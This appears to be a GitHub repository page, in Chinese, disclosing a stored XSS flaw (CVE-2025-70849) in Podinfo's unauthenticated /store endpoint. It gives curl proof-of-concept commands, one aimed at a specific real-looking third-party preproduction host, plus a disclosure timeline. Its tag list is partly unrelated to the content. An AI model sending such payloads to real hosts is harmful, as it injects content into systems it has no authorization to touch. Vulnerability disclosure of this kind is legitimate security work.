deaprojects/CVE-2025-70849

GitHub: deaprojects/CVE-2025-70849

Podinfo 6.10.0及以下版本/store端点存在未授权存储型XSS漏洞的概念验证与漏洞详情披露。

Stars: 0 | Forks: 0

# CVE-2025-70849:Podinfo 中的存储型 XSS ## 概述 在 **Podinfo**(一个用于演示 Kubernetes 微服务的 Web 应用)中发现了一个安全漏洞 (CWE-79)。`/store` 功能允许未经身份验证的用户上传任意的 HTML/JS 内容,从而导致存储型 XSS。 ## 漏洞详情 - **CVE ID:** CVE-2025-70849 - **产品:** Podinfo - **受影响端点:** `/store` - **漏洞类型:** 存储型跨站脚本攻击 (XSS) - **受影响版本:** `<= 6.10.0` ## 概念验证 1. 发送恶意 payload: curl -X POST https://target/store -H "Content-Type: text/html" -d '

CVE-2025-70849

' 真实目标示例: curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '

CVE-2025-70849

' 2. 访问返回的哈希值:https:///store/ 示例:https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a ## 时间线 - **发现日期:** 2025年9月 - **通报厂商:** 2025年10月25日 - **厂商回应:** 已确认;表示目前没有修复时间表。 - **公开发布:** 2026年2月 ## 免责声明 本研究仅供教育目的使用。 ## 致谢: [Kazi Sabbir](https://github.com/kazisabu/CVE-2025-70849-Podinfo/tree/main) | ## 严重程度:中等 6.4
标签:CISA项目, CVE-2025-70849, CWE-79, Go语言工具, PoC, Podinfo, Web安全, 多模态安全, 子域名突变, 存储型XSS, 安全研究与披露, 数据可视化, 暴力破解, 未授权访问, 漏洞分析, 网络安全, 蓝队分析, 跨站脚本攻击, 路径探测, 隐私保护